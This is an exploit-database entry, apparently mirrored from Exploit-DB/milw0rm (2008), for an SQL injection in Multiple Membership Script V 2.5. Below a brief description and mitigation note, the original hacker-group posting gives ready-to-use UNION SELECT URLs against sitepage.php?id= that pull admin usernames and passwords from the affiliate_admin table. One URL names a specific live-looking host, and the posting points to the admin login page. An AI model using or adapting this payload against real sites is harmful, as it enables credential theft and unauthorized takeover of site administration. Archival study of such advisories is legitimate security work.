Multiple Membership Script V 2.5 SQL Injection Vulnerability

vendor:

Multiple Membership Script V 2.5

by:

ViRuS_HaCkErS

CVSS

HIGH

SQL Injection

CWE

Product Name: Multiple Membership Script V 2.5

Affected Version From: Multiple Membership Script V 2.5

Affected Version To: Multiple Membership Script V 2.5

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Multiple Membership Script V 2.5 SQL Injection Vulnerability

A vulnerability exists in Multiple Membership Script V 2.5 which allows an attacker to inject malicious SQL commands and gain access to sensitive information from the database. An attacker can exploit this issue by supplying a specially crafted parameter value to the vulnerable application. This can be exploited to gain access to the database and execute arbitrary SQL commands.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, access to the database should be restricted to only those accounts that require it.

Source

Exploit-DB raw data:

================================================
  Multiple Membership Script V 2.5 SQL Injection Vulnerability
================================================
  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O .. Gaza Hacker Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /          
  / XXXXXX /
 (________(            
  `------'

AUTHOR : ViRuS_HaCkErS
Email  : h8g@hotmail.com
SITE   : gaza-hacker.com  & hacker.ps

#####################################################
#####################################################
---------
 Exploit
---------
SQL Injection Vulnerability

http://www.site.com/sitepage.php?id=-15+union+select+1,concat_ws(password,0x3a,username),3,4,5+from+affiliate_admin

sitepage.php?id=-15+union+select+1,concat_ws(password,0x3a,username),3,4,5+from+affiliate_admin
http://www.pricelesshost.com/mmsv2/sitepage.php?id=-15+union+select+1,concat_ws(password,0x3a,username),3,4,5+from+affiliate_admin
 
Login : http://www.site.com/admin

#######################################################################################
Gaza Hacker TeaM : Le0n &  Lito & cLAw & zero cod
#######################################################################################

# milw0rm.com [2008-12-05]